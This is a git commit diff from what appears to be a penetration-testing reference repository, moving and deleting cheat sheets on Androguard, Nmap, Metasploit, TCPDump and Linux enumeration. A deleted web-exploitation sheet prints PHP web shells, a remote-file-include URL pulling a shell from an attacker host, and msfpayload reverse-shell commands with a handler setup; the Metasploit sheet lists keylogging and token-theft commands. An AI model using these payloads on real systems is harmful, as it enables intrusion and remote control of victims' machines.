Browse Source

Fixed some stuff

pull/11/head
Robert Musser 4 years ago
parent
commit
5cc3c33838
49 changed files with 502 additions and 3467 deletions
  1. +1
    -1
      Draft/ATT&CK-Stuff/Exfiltration.md
  2. +1
    -1
      Draft/ATT&CK-Stuff/Privilege_Escalation.md
  3. +17
    -0
      Draft/ATT&CK-Stuff/README.md
  4. +0
    -307
      Draft/Cheat sheets reference pages Checklists -/Androguard.txt
  5. +0
    -11
      Draft/Cheat sheets reference pages Checklists -/Curl.txt
  6. +0
    -0
      Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf
  7. +0
    -60
      Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt
  8. +0
    -112
      Draft/Cheat sheets reference pages Checklists -/Metasploit.txt
  9. +0
    -0
      Draft/Cheat sheets reference pages Checklists -/Meterpreter Scripts and Description.txt
  10. +3
    -0
      Draft/Cheat sheets reference pages Checklists -/Ncat.txt
  11. +122
    -0
      Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.md
  12. +0
    -119
      Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt
  13. +305
    -190
      Draft/Cheat sheets reference pages Checklists -/Radare2.md
  14. +0
    -0
      Draft/Cheat sheets reference pages Checklists -/Random Shit/detect_virtual_box_c_prog.txt
  15. +0
    -1
      Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt
  16. +0
    -57
      Draft/Cheat sheets reference pages Checklists -/TCPDump.txt
  17. +0
    -3
      Draft/Cheat sheets reference pages Checklists -/ToDO.txt
  18. +0
    -98
      Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt
  19. +0
    -35
      Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt
  20. +0
    -0
      Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf
  21. +2
    -0
      Draft/Cheat sheets reference pages Checklists -/list_of_emoji.md
  22. +0
    -0
      Draft/Cheat sheets reference pages Checklists -/metasploit.md
  23. +0
    -111
      Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt
  24. +0
    -69
      Draft/Counter_Surveillance.md
  25. +0
    -19
      Draft/Frameworks Methodologies/Metasploit Reference.txt
  26. +0
    -110
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt
  27. +0
    -832
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt
  28. +0
    -315
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Network Footprinting.txt
  29. +0
    -0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf
  30. +0
    -29
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Password Cracking.txt
  31. +0
    -73
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Penetration.txt
  32. +0
    -128
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/VoIP Security.txt
  33. +0
    -67
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt
  34. +0
    -231
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt
  35. +0
    -271
      Draft/Frameworks Methodologies/Post Exploitation with Metasploit.txt
  36. +0
    -0
      Draft/Rants&Writeups/Gamma_group_hack_writeup.txt
  37. +0
    -0
      Draft/Rants&Writeups/Hacking Team Writeup.md
  38. +0
    -0
      Draft/Rants&Writeups/Opsec_rant-alpraking.md
  39. +0
    -0
      Draft/Rants&Writeups/Opsec_rant2-nachash.md
  40. +28
    -18
      Draft/Red-Teaming.md
  41. +0
    -53
      Draft/Securing Hardening_1/Cull.txt
  42. +0
    -26
      Draft/Securing Hardening_1/Finding Rootkits.txt
  43. +0
    -42
      Draft/Securing Hardening_1/List of Guides.txt
  44. +0
    -1
      Draft/Securing Hardening_1/Reference List.txt
  45. +0
    -21
      Draft/Securing Hardening_1/Securing Browsers.txt
  46. +0
    -0
      Draft/Securing Hardening_1/Securing Hardening_1.rtf
  47. +5
    -22
      Draft/Securing Hardening_1/Securing Windows Desktop.txt
  48. +2
    -4
      Draft/help.md
  49. +16
    -30
      README.md

+ 1
- 1
Draft/ATT&CK-Stuff/Exfiltration.md View File

@ -1,6 +1,6 @@
# Exfiltration
-------------------------------
See --> [Exfiltration](../../Exfiltration.md)
See --> [Exfiltration](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Exfiltration.md)


+ 1
- 1
Draft/ATT&CK-Stuff/Privilege_Escalation.md View File

@ -1,4 +1,4 @@
# Windows Privlege Escalation
# Privlege Escalation
[MITRE ATT&CK - Privilege Escalation](https://attack.mitre.org/wiki/Privilege_Escalation)


+ 17
- 0
Draft/ATT&CK-Stuff/README.md View File

@ -0,0 +1,17 @@
#### MITRE ATT&CK Framework Mappings
---------------------------
* MITRE ATT&CK Framework ([MITRE ATT&CK Framework](https://attack.mitre.org/wiki/Main_Page)) for attackers.
* This is a copy of the mappings with links to techniques and background information rather than APT reports.
* If you want to test your defenses against a lot of these things:
* [Atomic Red Team - Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.](https://github.com/redcanaryco/atomic-red-team)
* [Collection](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Collection.md)
* [Command and Control](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Command_and_Control.md)
* [Credential Access](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Command_and_Control.md)
* [Defense Evasion](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Defense_Evasion.md)
* [Discovery](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Discovery.md)
* [Execution](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Execution.md)
* [Exfiltration](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Exfiltration.md)
* [Lateral Movement](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Lateral%20Movement.md)
* [Persistence](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Persistence.md)
* [Privilege Escalation](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Privilege_Escalation.md)

+ 0
- 307
Draft/Cheat sheets reference pages Checklists -/Androguard.txt View File

@ -1,307 +0,0 @@
USAGE
Androaxml
Androapkinfo
Androcsign
Androdd
Androdiff
Androdump
Androgexf
Androlyze
Andromercury
Androrisk
Androsign
Androsim
Androxgmml
Apkviewer
USAGE
Androaxml
BlogPost1
You can used it to transform Android's binary XML (eg: AndroidManifest.xml) into classic xml (human readable ;)).
$ ./androaxml.py -h
Usage: androaxml.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
filename input (APK or android's binary xml)
-o OUTPUT, --output=OUTPUT
filename output of the xml
-v, --version version of the API
$ ./androaxml.py -i yourfile.apk -o output.xml
$ ./androaxml.py -i AndroidManifest.xml -o output.xml
Androapkinfo
This tool displays information on a given APK:
permissions
services
activities
receivers
usage of native code
usage of native code
axelle$ ./androapkinfo.py -i qicsomos.apk
FILES:
META-INF/MANIFEST.MF META-INF/MANIFEST.MF -7eb55c04
res/layout/main.xml res/layout/main.xml 54a83b5b
AndroidManifest.xml AndroidManifest.xml 2eef2f86
res/drawable-mdpi/ic_launcher.png res/drawable-mdpi/ic_launcher.png -22437ab
res/drawable-hdpi/ic_launcher.png res/drawable-hdpi/ic_launcher.png -4e108fda
META-INF/PLATFORM.RSA META-INF/PLATFORM.RSA 5c8d71d3
META-INF/PLATFORM.SF META-INF/PLATFORM.SF 5b48f7ec
resources.arsc resources.arsc -55923b8c
classes.dex classes.dex -bafd464
res/drawable-ldpi/ic_launcher.png res/drawable-ldpi/ic_launcher.png -6272d259
PERMISSIONS:
android.permission.SEND_SMS ['dangerous', 'send SMS messages', 'Allows application to send SMS messages. Malicious applications may cost you money by sending messages without your confirmation.']
android.permission.READ_LOGS ['dangerous', 'read sensitive log data', "Allows an application to read from the system's various log files. This allows it to discover general information about what you are doing with the phone, potentially including personal or private information."]
MAIN ACTIVITY: org.projectvoodoo.simplecarrieriqdetector.Main
ACTIVITIES: ['org.projectvoodoo.simplecarrieriqdetector.Main']
SERVICES: []
RECEIVERS: []
PROVIDERS: []
Native code: False
Dynamic code: False
Reflection code: False
Androcsign
This tool helps you to create your own signatures in order to add them in the database. In fact, it's more easy after an analysis to isolate which parts are the more interesting to add in the database in order to detect the malware (and variants). So, the idea is to describe your signature of a malware in a json format file to add this signature to the database.
desnos@destiny:~/androguard$ ./androcsign.py -h
Usage: androcsign.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use this filename
-r REMOVE, --remove=REMOVE
remote the signature
-o OUTPUT, --output=OUTPUT
output database
-l LIST, --list=LIST list signatures in database
-c CHECK, --check=CHECK
check signatures in database
-v, --version version of the API
The input file is a classical json format :
[ { "SAMPLE" : "apks/malwares/DroidDream/Magic Hypnotic Spiral.apk" }, { "BASE" : "AndroidOS", "NAME" : "DroidDream", "SIGNATURE" : [ { "TYPE" : "METHSIM", "CN" : "Lcom/android/root/Setting;", "MN" : "postUrl", "D" : "(Ljava/lang/String; Landroid/content/Context;)V" } ], "BF" : "0" } ]
where SAMPLE is the file where signatures will be extracted. NAME is the name of your signature. And SIGNATURE is a list of dictionnary which describes all sub-signatures.
A sub-signature can be a :
METHSIM : CN is the classname, NM is the method name, and D is the descriptor CLASSSIM : CN is the classname So a sub-signature can be apply on a specific method or directly on an entire class.
BF is the boolean formula of the whole signature, so it's possible to mix different sub-signatures.
When the sub-signature is added to the database, the engine will keep only interesting information :
entropies of general signature, android packages, java packages, binary raw, and exceptions. These entropies are using to clustering sub-signatures and compare items : it is these values that which will be used to apply clustering, value of the general signature : it is this value that which will be used to apply similarity distance on each required cluster. In the previous output, we isolated one method (postUrl) in an application (droiddream malware) to create a new signature. Androcsign will extract useful information of this application to add the signature in the database :
desnos@destiny:~/androguard$ ./androcsign.py -i signatures/droiddream.sign -o signatures/dbandroguard
[{u'DroidDream': [[[0, 'QltTUDBQMVNTUDJQMlAwRjBQMVAxU1AxRjBQMVAxUDFQMVAxUDJQMFAxUDFQMVAxU1AxUDFQMFAxXUJbUDFJUDFdQltQMV
Androdd
This tool is used to output graphs for each method of each class of an Android package.
$ ./androdd.py --help
Usage: androdd.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use this filename
-o OUTPUT, --output=OUTPUT
base directory to output all files
-d, --dot write the method in dot format
-f FORMAT, --format=FORMAT
write the method in specific format (png, ...)
-v, --version version of the API
input: an Android APK or classes.dex
output directory is mandatory, or the tool does not output anything.
output formats: PNG, JPG.
if you wish both DOT and PNG output for ex, mix options -d and -f PNG
Androdiff
The tool is used to compare/display the differences between two apps. The documentation is available here
Androdump
BlogPost1
You can used it to dump a linux process in order to get the original class files.
$ ./androdump.py -h
Usage: androdump.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
pid
-v, --version version of the API
pouik@camelot:~/androguard$ ps aux |grep java
pouik 21008 0.1 0.5 673840 10688 pts/5 Sl+ 10:28 0:02 java Test2
pouik 21548 0.0 0.0 3060 812 pts/2 S+ 11:00 0:00 grep java
pouik@camelot:~/androguard$ ./androdump.py -i 21008
HEADER 0x6f990000-0x6fee0000 (rw-p)
Test2 ()V
Test2 get_x ()I
Test2 main ([Ljava/lang/String;)V
Test2bis ()V
Test2bis get_T ()Ljava/lang/String;
Androgexf
This tool outputs graphs using the GEXF format.
desnos@destiny:~/androguard$ ./androgexf.py -h
Usage: androgexf.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
filename input (dex, apk)
-o OUTPUT, --output=OUTPUT
filename output of the xgmml
For instance,
desnos@destiny:~/androguard$ ./androgexf.py -i YOURAPP.apk -o YOURAPP.gexf
The output graph can be viewed using an external tool, named Gephi. For real examples of visualization of Android malware, please see this page.
Androlyze
Androlyze is a tool to analyze Android applications. The most common features are available via command line, the others via a Python interactive shell:
Usage: androlyze.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use this filename
-d, --display display the file in human readable format
-m METHOD, --method=METHOD
display method(s) respect with a regexp
-f FIELD, --field=FIELD
display field(s) respect with a regexp
-s, --shell open a shell to interact more easily with objects
-v, --version version of the API
-p, --pretty pretty print !
-t TYPE_PRETTY, --type_pretty=TYPE_PRETTY
set the type of pretty print (0, 1) !
-x, --xpermissions show paths of permissions
Using androlyze via the interactive shell opens up to tons of other features. Basically, all functions of the code are available that way:
./androlyze.py -s
Welcome to Androlyze ALPHA 0-update1
>>> j = JVMFormat( open("./VM.class").read() )
>>> j.show()
# Get specific methods
>>> x = j.get_method("<init>")[0]
>>> x.show()
# Change name
>>> x.set_name("toto")
# Save it
>>> fd = open("VM2.class", "w")
>>> fd.write(j.save())
>>> fd.close()
Andromercury
This tool links with the Mercury framework
See blog post
$ ./andromercury.py -h
Usage: andromercury.py [options]
Options:
-h, --help show this help message and exit
-l LIST, --list=LIST list all packages
-i INPUT, --input=INPUT
get specific packages (a filter)
-r REMOTEHOST, --remotehost=REMOTEHOST
specify ip of emulator/device
-p PORT, --port=PORT specify the port
-o OUTPUT, --output=OUTPUT
output directory to write packages
-b DATABASE, --database=DATABASE
database : use this database
-c CONFIG, --config=CONFIG
use this configuration
-v, --verbose display debug information
Androrisk
./androrisk.py -h
Usage: androrisk.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use these filenames
-a, --analysis perform analysis to calculate the risk
-m, --method perform analysis of each method
-d DIRECTORY, --directory=DIRECTORY
directory : use this directory
-v, --version version of the API
Androsign
Checks whether a given sample is listed in the database or not.
$ ./androsign.py -h
Usage: androsign.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use this filename
-d DIRECTORY, --directory=DIRECTORY
directory : use this directory
-b DATABASE, --database=DATABASE
database : use this database
-c CONFIG, --config=CONFIG
use this configuration
-v, --verbose display debug information
For example, see http://code.google.com/p/androguard/wiki/AndroidMalwareAnalysis:
$ ./androsign.py -d apks/malwares/foncy/ -b signatures/dbandroguard -c signatures/dbconfig
98a402d885cdb941dca8b45a4bbcbbe7f44ba62910d519bc1c2161dba117ebd2 : ----> Foncy
81dd17ea168cf884bfb5aebb7cd2241a5624d1ae14444594bf7677e1080339f9 : ----> Foncy
d9ef940236f285548a60be0d575d7bba4587bdfc3f6c56f38b5da601686344a9 : ----> Foncy
SuiConFo 1.26.apk : ----> None
127sc.apk : ----> None
Androsim
The tool is used to get the similarities between two apps. The documentation is available here
axelle@caiman:~/softs/androguard$ ./androsim.py -h
Usage: androsim.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use these filenames
-t THRESHOLD, --threshold=THRESHOLD
define the threshold
-c COMPRESSOR, --compressor=COMPRESSOR
define the compressor
-d, --display display all information about methods
-n, --new don't calculate the similarity score with new methods
-e EXCLUDE, --exclude=EXCLUDE
exclude specific class name (python regexp)
-s SIZE, --size=SIZE exclude specific method below the specific size
-x, --xstrings display similarities of strings
-v, --version version of the API
-l LIBRARY, --library=LIBRARY
use python library (python) or specify the path of the
shared library)
Androxgmml
BlogPost1
You can used it to transform an apk/jar/class/dex files format into an xgmml graph which represent the control flow graph or the functions call.
$ ./androxgmml.py -h
Usage: androxgmml.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
filename input
-o OUTPUT, --output=OUTPUT
filename output of the xgmml
-f, --functions include function calls
-e, --externals include extern function calls
-v, --version version of the API
./androxgmml.py -i myapp.jar -o output.xgmml
./androxgmml.py -i myapp.apk -o output.xgmml
./androxgmml.py -i myclass.class -o output.xgmml
./androxgmml.py -i mydex.dex -o output.xgmml
# with functions call :
./androxgmml.py -i myapp.jar -f -o output.xgmml
# with external function calls
./androxgmml.py -i myapp.jar -e -o output.xgmml
# with both
./androxgmml.py -i myapp.jar -e -f -o output.xgmml
Apkviewer
./apkviewer.py -h
Usage: apkviewer.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
filename input (dex, apk)
-o OUTPUT, --output=OUTPUT
directory output

+ 0
- 11
Draft/Cheat sheets reference pages Checklists -/Curl.txt View File

@ -1,11 +0,0 @@
Curl
About Curl
Taken from: http://curl.haxx.se/docs/manpage.html
Curl is a tool to transfer data from or to a server, using one of the supported protocols (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP). The command is designed to work without user interaction.
curl offers a busload of useful tricks like proxy support, user authentication, FTP upload, HTTP post, SSL connections, cookies, file transfer resume, Metalink, and more.
Scripting

+ 0
- 0
Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf View File


+ 0
- 60
Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt View File

@ -1,60 +0,0 @@
LinEnum: https://github.com/rebootuser/LinEnum
High-level summary of the checks/tasks performed by LinEnum:
Kernel and distribution release details
System Information:
Hostname
Networking details:
Current IP
Default route details
DNS server information
User Information:
Current user details
Last logged on users
List all users including uid/gid information
List root accounts
Extracts password policies and hash storage method information
Checks umask value
Checks if password hashes are stored in /etc/passwd
Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
Attempt to read restricted files i.e. /etc/shadow
List current users history files (i.e .bash_history, .nano_history etc.)
Basic SSH checks
Privileged access:
Determine if /etc/sudoers is accessible
Determine if the current user has Sudo access without a password
Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
Is root’s home directory accessible
List permissions for /home/
Environmental:
Display current $PATH
Jobs/Tasks:
List all cron jobs
Locate all world-writable cron jobs
Locate cron jobs owned by other users of the system
Services:
List network connections (TCP & UDP)
List running processes
Lookup and list process binaries and associated permissions
List inetd.conf/xined.conf contents and associated binary file permissions
List init.d binary permissions
Version Information (of the following):
Sudo
MYSQL
Postgres
Apache
Checks user config
Default/Weak Credentials:
Checks for default/weak Postgres accounts
Checks for default/weak MYSQL accounts
Searches:
Locate all SUID/GUID files
Locate all world-writable SUID/GUID files
Locate all SUID/GUID files owned by root
Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
List all world-writable files
Find/list all accessible *.plan files and display contents
Find/list all accessible *.rhosts files and display contents
Show NFS server details
Locate *.conf and *.log files containing keyword supplied at script runtime
List all *.conf files located in /etc
Locate mail

+ 0
- 112
Draft/Cheat sheets reference pages Checklists -/Metasploit.txt View File

@ -1,112 +0,0 @@
Metasploit Reference
*The* Guide to Metasploit
http://www.offensive-security.com/metasploit-unleashed/Main_Page
Metasploit: Penetration Tester’s Guide Book
http://www.nostarch.com/metasploit
http://pentestlab.wordpress.com/2012/03/13/msfconsole-commands-cheat-sheet/
CMD Cheat Sheet
http://ultimatepeter.com/how-to-hack-ultimate-metasploit-meterpreter-command-cheat-sheet/
Meterpreter CMD Reference
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics
Video training series for Metasploit(free)
http://www.securitytube.net/groups?operation=view&groupId=10
Using the Metasploit Framework
https://wiki.archlinux.org/index.php/Metasploit_Framework#Usage
Metasploit Commands
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
File System Commands
cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim
Networking Commands
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
System Commands
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
User Interface Commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
Privilege Escalation Commands
getsystem - uses 15 built-in methods to gain sysadmin privileges

Draft/Frameworks Methodologies/Meterpreter Scripts and Description.txt → Draft/Cheat sheets reference pages Checklists -/Meterpreter Scripts and Description.txt View File


+ 3
- 0
Draft/Cheat sheets reference pages Checklists -/Ncat.txt View File

@ -2,6 +2,9 @@ Ncat
Ncat is a piece of software created by the same person who made Nmap, Fyodor, as an upgrade to netcat.
http://alexcreek.com/ncat-cheatsheet.html
https://bitrot.sh/cheatsheet/19-12-2017-ncat/


Draft/Cheat sheets reference pages Checklists -/Nmap.txt → Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.md View File


+ 0
- 119
Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt View File

@ -1,119 +0,0 @@
CheatSheet: Nmap Cheat Sheet
Basic Scanning Techniques
Scan a single target —> nmap [target]
Scan multiple targets —> nmap [target1,target2,etc]
Scan a list of targets —-> nmap -iL [list.txt]
Scan a range of hosts —-> nmap [range of IP addresses]
Scan an entire subnet —-> nmap [IP address/cdir]
Scan random hosts —-> nmap -iR [number]
Excluding targets from a scan —> nmap [targets] –exclude [targets]
Excluding targets using a list —> nmap [targets] –excludefile [list.txt]
Perform an aggressive scan —> nmap -A [target]
Scan an IPv6 target —> nmap -6 [target]
Discovery Options
Perform a ping scan only —> nmap -sP [target]
Don’t ping —> nmap -PN [target]
TCP SYN Ping —> nmap -PS [target]
TCP ACK ping —-> nmap -PA [target]
UDP ping —-> nmap -PU [target]
SCTP Init Ping —> nmap -PY [target]
ICMP echo ping —-> nmap -PE [target]
ICMP Timestamp ping —> nmap -PP [target]
ICMP address mask ping —> nmap -PM [target]
IP protocol ping —-> nmap -PO [target]
ARP ping —> nmap -PR [target]
Traceroute —> nmap –traceroute [target]
Force reverse DNS resolution —> nmap -R [target]
Disable reverse DNS resolution —> nmap -n [target]
Alternative DNS lookup —> nmap –system-dns [target]
Manually specify DNS servers —> nmap –dns-servers [servers] [target]
Create a host list —-> nmap -sL [targets]
Advanced Scanning Options
TCP SYN Scan —> nmap -sS [target]
TCP connect scan —-> nmap -sT [target]
UDP scan —-> nmap -sU [target]
TCP Null scan —-> nmap -sN [target]
TCP Fin scan —> nmap -sF [target]
Xmas scan —-> nmap -sX [target]
TCP ACK scan —> nmap -sA [target]
Custom TCP scan —-> nmap –scanflags [flags] [target]
IP protocol scan —-> nmap -sO [target]
Send Raw Ethernet packets —-> nmap –send-eth [target]
Send IP packets —-> nmap –send-ip [target]
Port Scanning Options
Perform a fast scan —> nmap -F [target]
Scan specific ports —-> nmap -p [ports] [target]
Scan ports by name —-> nmap -p [port name] [target]
Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all ports —-> nmap -p “*” [target]
Scan top ports —–> nmap –top-ports [number] [target]
Perform a sequential port scan —-> nmap -r [target]
Version Detection
Operating system detection —-> nmap -O [target]
Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/
Attempt to guess an unknown —-> nmap -O –osscan-guess [target]
Service version detection —-> nmap -sV [target]
Troubleshooting version scans —-> nmap -sV –version-trace [target]
Perform a RPC scan —-> nmap -sR [target]
Timing Options
Timing Templates —-> nmap -T [0-5] [target]
Set the packet TTL —-> nmap –ttl [time] [target]
Minimum of parallel connections —-> nmap –min-parallelism [number] [target]
Maximum of parallel connection —-> nmap –max-parallelism [number] [target]
Minimum host group size —–> nmap –min-hostgroup [number] [targets]
Maximum host group size —-> nmap –max-hostgroup [number] [targets]
Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]
Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]
Maximum retries —-> nmap –max-retries [number] [target]
Host timeout —-> nmap –host-timeout [time] [target]
Minimum Scan delay —-> nmap –scan-delay [time] [target]
Maximum scan delay —-> nmap –max-scan-delay [time] [target]
Minimum packet rate —-> nmap –min-rate [number] [target]
Maximum packet rate —-> nmap –max-rate [number] [target]
Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]
Firewall Evasion Techniques
Fragment packets —-> nmap -f [target]
Specify a specific MTU —-> nmap –mtu [MTU] [target]
Use a decoy —-> nmap -D RND: [number] [target]
Idle zombie scan —> nmap -sI [zombie] [target]
Manually specify a source port —-> nmap –source-port [port] [target]
Append random data —-> nmap –data-length [size] [target]
Randomize target scan order —-> nmap –randomize-hosts [target]
Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]
Send bad checksums —-> nmap –badsum [target]
Output Options
Save output to a text file —-> nmap -oN [scan.txt] [target]
Save output to a xml file —> nmap -oX [scan.xml] [target]
Grepable output —-> nmap -oG [scan.txt] [target]
Output all supported file types —-> nmap -oA [path/filename] [target]
Periodically display statistics —-> nmap –stats-every [time] [target]
133t output —-> nmap -oS [scan.txt] [target]
Troubleshooting and debugging
Help —> nmap -h
Display Nmap version —-> nmap -V
Verbose output —-> nmap -v [target]
Debugging —-> nmap -d [target]
Display port state reason —-> nmap –reason [target]
Only display open ports —-> nmap –open [target]
Trace packets —> nmap –packet-trace [target]
Display host networking —> nmap –iflist
Specify a network interface —> nmap -e [interface] [target]
Nmap Scripting Engine
Execute individual scripts —> nmap –script [script.nse] [target]
Execute multiple scripts —-> nmap –script [expression] [target]
Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln
Execute scripts by category —-> nmap –script [category] [target]
Execute multiple scripts categories —-> nmap –script [category1,category2, etc]
Troubleshoot scripts —-> nmap –script [script] –script-trace [target]
Update the script database —-> nmap –script-updatedb
Ndiff
Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]
XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]

Draft/Cheat sheets reference pages Checklists -/Radare2.txt → Draft/Cheat sheets reference pages Checklists -/Radare2.md View File


Draft/detect_virtual_box_c_prog.txt → Draft/Cheat sheets reference pages Checklists -/Random Shit/detect_virtual_box_c_prog.txt View File


+ 0
- 1
Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt View File

@ -1 +0,0 @@

+ 0
- 57
Draft/Cheat sheets reference pages Checklists -/TCPDump.txt View File

@ -1,57 +0,0 @@
TCPDump:
SANS TCPDump reference
https://www.sans.org/security-resources/tcpip.pdf
Cheat Sheet reference guide
http://packetlife.net/media/library/12/tcpdump.pdf
Excellent TCPDump Reference Guide
http://danielmiessler.com/study/tcpdump/
Sample commands:
Port Ranges // see traffic to any port in a range
tcpdump port range 21-23
Capture all Port 80 Traffic to a File
tcpdump -s 1514 port 80 -w capture_file
host // look for traffic based on IP address (also works with hostname if you’re not using -n)
tcpdump host 1.2.3.4
src, dst // find traffic from only a source or destination (eliminates one side of a host conversation)
tcpdump src 2.3.4.5
tcpdump dst 3.4.5.6
net // capture an entire network using CIDR notation
tcpdump net 1.2.3.0/24
proto // works for tcp, udp, and icmp
tcpdump icmp
port // see only traffic to or from a certain port
tcpdump port 3389
src, dst port // filter based on the source or destination port
tcpdump src port 1025 # tcpdump dst port 389
src/dst, port, protocol // combine all three
tcpdump src port 1025 and tcp
tcpdump udp and src port 53

+ 0
- 3
Draft/Cheat sheets reference pages Checklists -/ToDO.txt View File

@ -1,3 +0,0 @@
Tools that need cmd refs:

+ 0
- 98
Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt View File

@ -1,98 +0,0 @@
Web Application exploitation - a cheatsheet By Tim Arneaud
If you want to get the full article, please go to the Source.
WebShell Backdoors
Minimal php command shells
file cmd.php: PHP script text =>
<?php system($_GET['cmd']) ?>
or
<?php system($_REQUEST['cmd']); ?>
Example usage via Remote File Include (RFI):
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Encoding windows reverse command shell as asp
msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp
Encoding meterpreter in asp
msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp
------
attacker msfconsole:
use multi/exploit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT <attacker-multi-handler-port>
exploit
Specific Web applications
Joomla
Joomla default database configuration filename
<web-app-path>/configuration.php
Scanning Joomla! for plugins and versions
